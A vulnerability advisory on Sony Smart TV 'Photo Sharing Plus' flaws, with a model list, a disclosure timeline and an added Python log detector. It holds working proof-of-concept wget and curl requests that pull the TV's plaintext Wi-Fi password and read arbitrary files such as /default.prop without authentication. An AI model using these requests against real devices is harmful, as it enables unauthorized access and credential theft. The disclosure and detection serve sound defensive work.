
Sony Smart TV Information Disclosure / File Read

2019-04-24 00:00:00
xen1thLabs
packetstormsecurity.com

EPSS: 0.005 (Low), percentile 73.0%

`UNCLASSIFIED  
  
## ADVISORY INFORMATION  
  
TITLE: Multiple vulnerabilities in Sony Smart TVs  
ADVISORY URL:   
https://www.darkmatter.ae/blogs/security-flaws-uncovered-in-sony-smart-tvs/  
DATE PUBLISHED: 23/04/2019  
AFFECTED VENDORS: Sony  
RELEASE MODE: Coordinated release  
CVE: CVE-2019-10886, CVE-2019-11336  
CVSSv3 for CVE-2019-10886: 6.5 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)  
CVSSv3 for CVE-2019-11336: 6.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)  
  
  
  
## PRODUCT DESCRIPTION  
  
Sony Smart TVs ship with applications that add functionality for customers,  
including the "Photo Sharing Plus" application.  
  
The "Photo Sharing Plus" application running inside the Smart TV contains  
several weaknesses. The application allows uploading pictures from a smartphone  
to the TV in order to display them on a large screen.  
When started, Photo Sharing Plus turns the TV into a Wi-Fi access point and  
shows a Wi-Fi password that allows customers to connect and share their media  
content on the Sony Smart TV.  
  
  
  
## DETAILS OF VULNERABILITIES  
  
xen1thLabs found multiple vulnerabilities in Sony products in October 2018 and  
coordinated the disclosure of these vulnerabilities with Sony.  
Two vulnerabilities were found in Sony Smart TVs by xen1thLabs while auditing  
the security of Smart TVs.  
The first vulnerability allows an attacker on the LAN/Wi-Fi, without  
authentication, to retrieve the static Wi-Fi password created by the television  
when the Photo Sharing Plus application is started.  
The second vulnerability allows an attacker to read arbitrary files on the TV  
without authentication, including sensitive files.  
  
The summary of the vulnerabilities is:  
  
- CVE-2019-10886 Sony Smart TV Photo Sharing Plus Arbitrary File Read Vulnerability  
- CVE-2019-11336 Sony Smart TV Photo Sharing Plus Information Disclosure Vulnerability  
  
The number of affected Sony models is very high and Sony has decided to remove  
this vulnerable application from all models  
(https://www.sony.com/electronics/support/televisions-projectors/articles/00204331).  
  
Sony provided a non-exhaustive list of affected TV models from 2015-2016.  
Recent models are also affected:  
  
- KDL-50W800C  
- KDL-50W805C  
- KDL-50W807C  
- KDL-50W809C  
- KDL-50W820C  
- KDL-55W800C  
- KDL-55W805C  
- KDL-65W850C  
- KDL-65W855C  
- KDL-65W857C  
- KDL-75W850C  
- KDL-75W855C  
- XBR-43X830C  
- XBR-49X800C  
- XBR-49X830C  
- XBR-49X835C  
- XBR-49X837C  
- XBR-49X839C  
- XBR-55X805C  
- XBR-55X807C  
- XBR-55X809C  
- XBR-55X810C  
- XBR-55X850C  
- XBR-55X855C  
- XBR-55X857C  
- XBR-65X800C  
- XBR-65X805C  
- XBR-65X807C  
- XBR-65X809C  
- XBR-65X810C  
- XBR-65X850C  
- XBR-65X855C  
- XBR-65X857C  
- XBR-75X850C  
- XBR-75X855C  
- XBR-55X900C  
- XBR-55X905C  
- XBR-55X907C  
- XBR-65X900C  
- XBR-65X905C  
- XBR-65X907C  
- XBR-65X930C  
- XBR-75X910C  
- XBR-75X940C  
- XBR-75X945C  
- XBR-43X800D  
- XBR-49X800D  
- XBR-49X835D  
- XBR-55X850D  
- XBR-55X855D  
- XBR-55X857D  
- XBR-65X850D  
- XBR-65X855D  
- XBR-65X857D  
- XBR-75X850D  
- XBR-75X855D  
- XBR-75X857D  
- XBR-85X850D  
- XBR-85X855D  
- XBR-85X857D  
- XBR-55X930D  
- XBR-65X930D  
- XBR-65X935D  
- XBR-65X937D  
- XBR-75X940D  
- XBR-100Z9D  
- XBR-49X700D  
- XBR-55X700D  
- XBR-65X750D  
- XBR-65Z9D  
- XBR-75Z9D  
- XBR-43X800E  
- XBR-49X800E  
- XBR-49X900E  
- XBR-55A1E  
- XBR-55X800E  
- XBR-55X806E  
- XBR-55X900E  
- XBR-55X930E  
- XBR-65A1E  
- XBR-65X850E  
- XBR-65X900E  
- XBR-65X930E  
- XBR-75X850E  
- XBR-75X900E  
- XBR-75X940E  
- XBR-77A1E  
  
  
  
### 1. CVE-2019-11336 Sony Smart TV Photo Sharing Plus Information Disclosure Vulnerability  
  
An unauthenticated remote attacker can retrieve the plaintext wireless password  
through the "Photo Sharing Plus" API.  
  
After starting the application, the following example retrieves the wireless  
password created by the TV (the IP address of the TV is 192.168.1.102) over the  
LAN, without authentication:  
  
```  
root@kali:~# wget -qO- --post-data='{"id":80,"method":"getContentShareServerInfo","params":[],"version":"1.0"}' http://[ip_tv]:10000/contentshare/  
{"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/192.168.49.1","touchPadRemote":"notSupported"}],"id":80}  
```  
  
The password is 8362tbwX.  
  
By reading the logs of the TV, we can confirm the password has been delivered  
over HTTP, without authentication. The logs contain the password in plaintext:  
  
```  
01-01 07:47:23.730 5539 18687 I System.out: [MEXI][D] HttpEndPoint: send: {"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/192.168.49.1","touchPadRemote":"notSupported"}],"id":80}  
```  
  
It is also important to note that the wireless password generated by the TV is  
always the same. Even after a hard reboot and a disconnection from the power  
supply, the generated password stays the same. This lack of randomness is also  
a security issue.  
  
  
  
### 2. CVE-2019-10886 Sony Smart TV Photo Sharing Plus Arbitrary File Read Vulnerability  
  
It is possible to retrieve internal TV files over HTTP without authentication.  
  
By default, images used by the Photo Sharing Plus application are stored inside  
`/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/`.  
The application starts an access point on the television and an HTTP daemon  
listens on a TCP port on this WLAN.  
Furthermore, this daemon also listens on the LAN side of the television, and it  
is possible to retrieve these images from the LAN using a URL of this form:  
  
http://[ip_tv]:10000/contentshare/image/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/LJYT0010.JPG  
  
Browsing the address http://[ip_tv]:10000/contentshare/image/ gives access to  
the root directory of the television running Android.  
  
By exploiting this vulnerability, /default.prop (containing Android properties)  
can be retrieved via http://192.168.1.102:10000/contentshare/image/default.prop:  
  
```  
root@kali:~# curl -v http://192.168.1.102:10000/contentshare/image/default.prop
*   Trying 192.168.1.102...
* TCP_NODELAY set
* Connected to 192.168.1.102 (192.168.1.102) port 10000 (#0)
> GET /contentshare/image/default.prop HTTP/1.1
> Host: 192.168.1.102:10000
> User-Agent: curl/7.58.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Connection: close
< Content-Length: 591
< Content-Type: application/octet-stream
<
#
# ADDITIONAL_DEFAULT_PROPERTIES
#
ro.secure=1
security.perf_harden=1
ro.allow.mock.location=0
ro.debuggable=0
ro.zygote=zygote32
dalvik.vm.image-dex2oat-Xms=64m
dalvik.vm.image-dex2oat-Xmx=64m
dalvik.vm.dex2oat-Xms=64m
dalvik.vm.dex2oat-Xmx=512m
ro.dalvik.vm.native.bridge=0
debug.atrace.tags.enableflags=0
#
# BOOTIMAGE_BUILD_PROPERTIES
#
ro.bootimage.build.date=2016年 11月 14日 月曜日 15:34:56 JST
ro.bootimage.build.date.utc=1479105296
ro.bootimage.build.fingerprint=Sony/BRAVIA_ATV2_PA/BRAVIA_ATV2:6.0.1/MMB29V.S50/1.6.0.06.14.0.00:user/release-keys
persist.sys.usb.config=none

* Closing connection 0
```  
  
Logs in the TV confirm the /default.prop file has been delivered over HTTP:  
  
```  
01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Handle get Uri :/contentshare/image/default.prop  
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]getLocalFilePath() start, uri=/contentshare/image/default.prop  
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]loadType: /contentshare/image  
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]localResPath: /default.prop  
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]ext:.prop  
01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Content Type :application/octet-stream  
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]fileSize:591  
01-01 07:46:00.892 5539 18775 D PhotoShareApp: [18775][e]Write to response ... 591  
01-01 07:46:00.892 5539 18775 D PhotoShareApp: [18775][e]Write to response completed.  
```  
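Both issues leave a trace in the TV's own logcat output, as the two log excerpts above show. The detector below is an added example, not part of the advisory, that scans such lines and flags (a) a "Photo Sharing Plus" response that carries the Wi-Fi key over HTTP and (b) a file served from outside the upload directory; the sample log is constructed from the advisory's lines plus one benign request for a legitimate image.

```python
import json
import posixpath
import re

# Upload directory named in the advisory.
IMAGE_DIR = "/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP"
# Android logcat "threadtime" format: date time pid tid level tag: message
LOGCAT_RE = re.compile(
    r"^(\d\d-\d\d \d\d:\d\d:\d\d\.\d+)\s+\d+\s+\d+\s+[VDIWEF]\s+([^:]+):\s+(.*)$")
SEND_MARK = "HttpEndPoint: send: "   # MEXI JSON-RPC reply going out over HTTP
PATH_MARK = "localResPath: "         # PhotoShareApp resolved file path

# Constructed sample: three lines from the advisory plus one benign image fetch.
SAMPLE_LOG = [
    "01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Handle get Uri :/contentshare/image/default.prop",
    "01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]localResPath: /default.prop",
    "01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]fileSize:591",
    "01-01 07:46:30.120 5539 18776 D PhotoShareApp: [18776][e]localResPath: " + IMAGE_DIR + "/LJYT0010.JPG",
    '01-01 07:47:23.730 5539 18687 I System.out: [MEXI][D] HttpEndPoint: send: {"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\\/\\/192.168.49.1","touchPadRemote":"notSupported"}],"id":80}',
]


def scan_logcat(lines):
    """Return (timestamp, finding, detail) tuples; the key itself is never copied
    into a finding so the detector does not spread the secret further."""
    findings = []
    for line in lines:
        m = LOGCAT_RE.match(line.rstrip("\n"))
        if not m:
            continue
        ts, tag, msg = m.groups()
        if tag == "System.out" and SEND_MARK in msg:
            try:
                doc = json.loads(msg.split(SEND_MARK, 1)[1])
            except ValueError:
                continue
            for entry in doc.get("result", []):
                if isinstance(entry, dict) and entry.get("key"):
                    findings.append((ts, "wifi-key-sent-over-http", entry.get("ssid", "")))
        elif tag == "PhotoShareApp" and PATH_MARK in msg:
            local = posixpath.normpath(msg.split(PATH_MARK, 1)[1].strip())
            if not local.startswith(IMAGE_DIR + "/"):
                findings.append((ts, "file-read-outside-image-dir", local))
    return findings
```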
  
  
## DISCLOSURE TIMELINE  
  
03/10/2018 - Vulnerabilities found  
10/10/2018 - Report to Sony - report to the Sony bug bounty program through  
HackerOne  
12/10/2018 - Confirmation of the reception of the bug report  
15/10/2018 - xen1thLabs explains that the vulnerabilities are also exploitable  
over HbbTV (DVB-{S,T,C}) - through HackerOne  
29/10/2018 - Sony confirms the vulnerabilities  
09/11/2018 - Sony confirms the patches will be available in March 2019 and asks  
xen1thLabs to wait until April 2019  
29/11/2018 - xen1thLabs sent the slides prior to xen1thLabs's HiTB 2018 Dubai  
talk as agreed with Sony  
14/01/2019 - Updates requested from xen1thLabs  
15/01/2019 - Sony informs xen1thlabs that they are working on patches  
27/01/2019 - Updates requested from xen1thLabs  
07/03/2019 - Updates requested from xen1thLabs  
15/03/2019 - Sony informs xen1thLabs that the agreed date for disclosure is not  
possible because they don't know when they will be ready "maybe in a couple of  
months"  
17/03/2019 - Updates requested from Sony to understand and to publish a  
security advisory. xen1thLabs also requests CVEs officially  
20/03/2019 - xen1thLabs asks for an acceptable timeline  
21/03/2019 - xen1thLabs sent an email to [email protected] due to the lack of  
proper communication from Sony and informing Sony that in order to protect  
their customers xen1thLabs needs to publish a security advisory   
21/03/2019 - Automatic response: [email protected] is no longer in use.  
22/03/2019 - Sony is working on the patches and confirms the 12th April  
26/03/2019 - xen1thLabs confirms the release date of the advisory and asks for  
CVEs  
01/04/2019 - Sony confirms the vulnerabilities affect some models and  
"Sony plans to terminate Photo Sharing Plus service for all of models,  
and that completion date is scheduled for April 12th, 2019."  
16/04/2019 - Sony only provides one CVE instead of two. Sony states  
"the wireless password recovery is within Sony's TV specification and is  
expected behavior and Sony will not be submitting for a CVE regarding this"  
17/04/2019 - xen1thLabs requests a CVE from MITRE  
23/04/2019 - Public disclosure  
  
  
  
## SOLUTION  
  
Apply the patches provided by Sony.  
  
  
  
## CREDITS  
  
xen1thLabs - Telecom Lab  
  
  
  
## REFERENCES  
  
https://www.darkmatter.ae/blogs/security-flaws-uncovered-in-sony-smart-tvs/  
  
Firmware update to v6.5830 from 01-22-2019 (including security patches?)  
https://www.sony.com/electronics/support/downloads/00015771  
  
Firmware update to v6.5830 from 01-22-2019 (not including security patches)  
https://www.sony.com/electronics/support/downloads/00015770  
  
End of Photo Sharing Plus 11/22/2018  
https://www.sony.com/electronics/support/articles/00204331  
  
https://www.darkmatter.ae/xen1thlabs/sony-smart-tv-photo-sharing-plus-arbitrary-file-read-vulnerability-xl-19-002/  
  
https://www.darkmatter.ae/xen1thlabs/sony-smart-tv-photo-sharing-plus-information-disclosure-vulnerability-xl-19-003/  
  
  
  
## ABOUT xen1thLabs  
  
xen1thLabs conducts vulnerability research, which feeds into the testing and  
validation activities it conducts across software, hardware and  
telecommunications.  
xen1thLabs houses a team of world-class experts dedicated to providing  
high-impact capabilities in cyber security.  
At xen1thLabs we are committed to uncovering new vulnerabilities in order to  
combat tomorrow's threats today.  
  
More information about xen1thLabs can be found at:  
https://www.darkmatter.ae/xen1thlabs/  
  
  
  
## WORKING AT xen1thLabs  
  
xen1thLabs is looking for several security researchers across multiple disciplines.  
Join a great team of like-minded specialists and enjoy all that the UAE has to offer!  
  
If you are interested please visit:  
https://www.darkmatter.ae/xen1thlabs/  
  
  
  
`
